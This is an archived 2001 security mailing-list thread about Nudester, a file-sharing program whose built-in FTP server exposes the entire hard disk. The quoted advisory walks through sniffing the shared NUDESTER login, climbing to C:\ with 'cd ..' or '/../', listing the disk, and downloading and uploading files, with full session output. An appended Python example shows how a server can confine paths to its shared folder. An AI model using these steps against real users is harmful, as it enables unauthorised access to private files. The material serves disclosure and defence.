You can gain full FTP access without a password. Just log in to the person running Nudester using any l/p and there you go. If you are using IE to browse files you cannot directly view other folders. The workaround is simple: ftp://127.0.0.0/../ will give you C:\ (the directory you start in is c:\temp). I do not think you can upload files using this method, but you can download and view folders/files. Using an FTP program such as the one that comes with Windows will allow full access. Don't know why that is. Not many people use Nudester (I found only 5 users when I did a search).

----- Original Message -----
From: "Gary" <Cyph3rat_private>
To: <bugtraqat_private>
Sent: Friday, August 17, 2001 2:34 AM
Subject: [Real Security] Advisory for Nudester 1.10

> <------------------------->
> [Real Security Advisory #1]
> [ Author: Cyph3r ]
> [ www.Real-Security.org ]
> [ Date: 08/16/2001 ]
> <------------------------->
> [Vulnerable: ]
> [Nudester 1.10(& below?)]
> [ OS: Win9x/me/2k/nt/xp ]
> [ Site: www.nudester.org ]
> <------------------------->
>
> -> Severity: Malicious users can gain full access to the user's files
> (upload/download)
>
> -> Overview: Nudester, a file sharing program for porn, uses the FTP protocol
> to transfer files.
> The problem is it gives access to the whole hard disk instead of just the
> folder containing porn.
> Example:
> Open Nudester and a sniffer program, i.e. Iris (www.eeye.com), and download a
> file from a user on Nudester
> while having the sniffer running filtering port 21 inclusive so you can get
> the password.
>
> <Sniffed Data>
>
> 220 ICS FTP Server ready
> user NUDESTER
> 331 Password required for NUDESTER
> pass NSASTdfg!"#.%&sd3214894231SDFGSD598502534
> 230 User NUDESTER logged in
>
> </Sniffed data>
>
> Open an ftp client and connect to the ip
>
> ftp> open ***.***.***.***
> Connected to ***.***.***.***
> 220 ICS FTP Server ready.
> User (***.***.***.***:(none)): NUDESTER
> 331 Password required for NUDESTER.
> Password: NSASTdfg!"#.%&sd3214894231SDFGSD598502534
> 230 User NUDESTER logged in.
>
> - Bingo!
>
> ftp> dir
> 200 Port command successful.
> 150 Opening data connection for directory list.
> C:\TEMP\*.* not found
> 226 File sent ok
> ftp: 23 bytes received in 0.04Seconds 0.57Kbytes/sec.
> ftp> cd ..
> 250 CWD command successful. "C:/" is current directory.
> ftp> DIR
> 200 Port command successful.
> 150 Opening data connection for directory list.
> -rw-rw-rw- 1 ftp ftp 1152 Oct 30 2000 FRUNLOG.TXT
> -rwxrwxrwx 1 ftp ftp 25473 May 15 1998 MSCDEX.EXE
> -rw-rw-rw- 1 ftp ftp 10604 May 15 1997 CDROM.SYS
> -rwxrwxrwx 1 ftp ftp 20135 May 15 1998 KEYB.COM
> -rw-rw-rw- 1 ftp ftp 34566 May 15 1998 KEYBOARD.SYS
> -rwxrwxrwx 1 ftp ftp 71102 May 15 1998 EDIT.COM
> -rw-rw-rw- 1 ftp ftp 38 Oct 16 1998 AUTOEXEC.OLD
> -rw-rw-rw- 1 ftp ftp 31 Oct 16 1998 CONFIG.OLD
> drw-rw-rw- 1 ftp ftp 0 Oct 30 2030 ATI
> -rw-rw-rw- 1 ftp ftp 121 Oct 29 2000 CONFIG.DOS
> -rw-rw-rw- 1 ftp ftp 113 Oct 29 2000 AUTOEXEC.DOS
> -rw-rw-rw- 1 ftp ftp 436 Nov 18 2000 AUTOEXEC.BAK
> drw-rw-rw- 1 ftp ftp 0 Oct 29 2000 WINDOWS
> drw-rw-rw- 1 ftp ftp 0 Oct 30 2000 WINDOWS.000
> -rw-rw-rw- 1 ftp ftp 7471 Nov 18 2000 NETLOG.TXT
> -rw-rw-rw- 1 ftp ftp 172 Nov 15 2000 CONFIG.BAK
> -rw-rw-rw- 1 ftp ftp 5048 Nov 17 2000 SETUPXLG.TXT
> -rwxrwxrwx 1 ftp ftp 438 Aug 16 00:43 AUTOEXEC.BAT
> dr--r--r-- 1 ftp ftp 0 Oct 29 2000 Program Files
> -rw-rw-rw- 1 ftp ftp 172 Nov 18 2000 CONFIG.SYS
> -rw-rw-rw- 1 ftp ftp 19622 Aug 10 18:50 SCANDISK.LOG
> -rw-rw-rw- 1 ftp ftp 327 Oct 30 2030 outreg.txt
> -rw-rw-rw- 1 ftp ftp 339 Oct 30 2030 outreg.ini
> drw-rw-rw- 1 ftp ftp 0 Oct 30 2030 dcpt
> -rwxrwxrwx 1 ftp ftp 17129 Oct 30 2030 BOOTDISK.EXE
> -rwxrwxrwx 1 ftp ftp 2884286 Oct 30 2030 DECOMP.EXE
> -rwxrwxrwx 1 ftp ftp 265420 Oct 30 2030 DOS4GW.EXE
> -rw-rw-rw- 1 ftp ftp 507 Oct 30 2030 FILE_ID.DIZ
> -rw-rw-rw- 1 ftp ftp 2086 Oct 30 2030 HELPME.DOC
> -rw-rw-rw- 1 ftp ftp 3639 Oct 30 2030 LICENSE.DOC
> -rw-rw-rw- 1 ftp ftp 1377 Oct 30 2030 ORDER.DOC
> drw-rw-rw- 1 ftp ftp 0 Nov 02 2000 KPCMS
> -rw-rw-rw- 1 ftp ftp 386 Nov 02 2000 AUTOEXEC.001
> drw-rw-rw- 1 ftp ftp 0 Nov 02 2000 psfonts
> -rw-rw-rw- 1 ftp ftp 25 Nov 03 2000 prompt
> -rwxrwxrwx 1 ftp ftp 95874 May 05 1999 COMMAND.COM
> drw-rw-rw- 1 ftp ftp 0 Nov 19 2000 Winzip
> drw-rw-rw- 1 ftp ftp 0 Dec 10 2000 unzipped
> drw-rw-rw- 1 ftp ftp 0 Nov 19 2000 Antivirus
> drw-rw-rw- 1 ftp ftp 0 Dec 16 2000 My Music
> -rw-rw-rw- 1 ftp ftp 118 Jan 20 00:27 netsig.txt
> drw-rw-rw- 1 ftp ftp 0 Mar 15 21:05 accelerator
> -rw-rw-rw- 1 ftp ftp 22721 Aug 17 01:00 winzip.log
> 226 File sent ok
> ftp: 4652 bytes received in 5.64Seconds 0.83Kbytes/sec.
>
> - Let's see if we have access to download a file
>
> ftp> get netsig.txt
> 200 Port command successful.
> 150 Opening data connection for netsig.txt.
> 226 File sent ok
> ftp: 118 bytes received in 0.00Seconds 118000.00Kbytes/sec.
>
> - Yep, let's try to upload a file
>
> ftp> put c:\temp.txt
> 200 Port command successful.
> 150 Opening data connection for TEMP.TXT.
> 226 File received ok
>
> -> Conclusion: anyone can gain full access to a Nudester user's files; the
> username is the same for every user.
> However the password is not the same, you will have to sniff while
> downloading a file to retrieve the password.
> The only solution to this problem is not to use Nudester.
>
> -> Credits: Cyph3r - Cyph3rat_private
>
> -> Greets: Pseudo, lice_, Electro, Deleted, Venomous, c0redump, acid,
> spasms, trew, zeronine, matt, shizniz, z0mb1e
> b0b, neonfreon, dragnet, c0de, spiked and anyone else i missed.
>
>
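The root cause shown in the thread is that the embedded FTP server resolves "cd .." (or a "/../" in a URL) against the real filesystem rather than against the folder it is meant to share, so the client lands in C:\. Below is an added example, written for this archive and not code from Nudester or the ICS FTP server, of the confinement check a file-sharing server needs before it acts on any CWD, LIST, RETR or STOR argument. It assumes a POSIX share root of /srv/share (on the Windows program in the advisory this would be its download folder, e.g. c:\temp); the function and exception names are this example's own.

```python
import os

# Both slash styles are treated as separators: Windows clients send either.
SEPARATORS = ("/", "\\")


class PathEscapesShare(Exception):
    """Raised when a client-supplied path would leave the shared folder."""


def _split_segments(path: str) -> list:
    """Break a client path into segments, dropping empty and '.' entries."""
    for sep in SEPARATORS[1:]:
        path = path.replace(sep, "/")
    return [seg for seg in path.split("/") if seg not in ("", ".")]


def resolve_share_path(share_root: str, cwd: str, client_path: str) -> str:
    """Map a client path onto the filesystem, allowing only locations at or
    below share_root.

    share_root:  filesystem directory being shared (e.g. /srv/share).
    cwd:         the session's current directory in the *virtual* tree,
                 maintained by the server ("/" means share_root itself).
    client_path: the argument of CWD/LIST/RETR/STOR exactly as received;
                 absolute paths start at the virtual root, relative at cwd.
    Returns the absolute filesystem path or raises PathEscapesShare.
    """
    base = [] if client_path[:1] in SEPARATORS else _split_segments(cwd)
    stack = list(base)
    for seg in _split_segments(client_path):
        if seg == "..":
            if not stack:
                # Climbing above the virtual root is exactly the defect the
                # advisory shows ("cd .." ending up in C:\): refuse it rather
                # than silently clamping, so the attempt can be logged.
                raise PathEscapesShare(client_path)
            stack.pop()
        elif ":" in seg or "\0" in seg:
            # A drive letter ("C:") would make os.path.join restart at another
            # root on Windows, and NUL truncates C strings; neither is a valid
            # name inside a share, so reject outright.
            raise PathEscapesShare(client_path)
        else:
            stack.append(seg)
    root = os.path.abspath(share_root)
    target = os.path.abspath(os.path.join(root, *stack))
    # Defence in depth: whatever the segment walk produced must still sit
    # under the root after OS-level normalisation.
    if os.path.commonpath([root, target]) != root:
        raise PathEscapesShare(client_path)
    return target


def is_confined(share_root: str, cwd: str, client_path: str) -> bool:
    """True if client_path stays inside the share; handy for audit logging
    of rejected requests without raising into the command loop."""
    try:
        resolve_share_path(share_root, cwd, client_path)
        return True
    except PathEscapesShare:
        return False


if __name__ == "__main__":
    # Constructed sample requests mirroring the thread: the IE-style "/../"
    # and the plain "cd .." from the root both get refused.
    for cwd, req in [("/", "pics/a.jpg"), ("/pics", ".."), ("/", ".."),
                     ("/", "/../"), ("/", "..\\..\\WINDOWS"), ("/", "C:\\WINDOWS")]:
        verdict = "ok     " if is_confined("/srv/share", cwd, req) else "REJECT "
        print(verdict, repr(cwd), repr(req))
```

Note that confinement only closes the traversal half of the advisory. The other half, one username shared by every installation with a password that any passive observer on the path can read from the cleartext FTP exchange, is not fixable inside the path logic; it needs per-user credentials and a transport that does not expose them, which is a different change from the one illustrated here.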
This archive was generated by hypermail 2b30 : Sun Aug 19 2001 - 19:04:48 PDT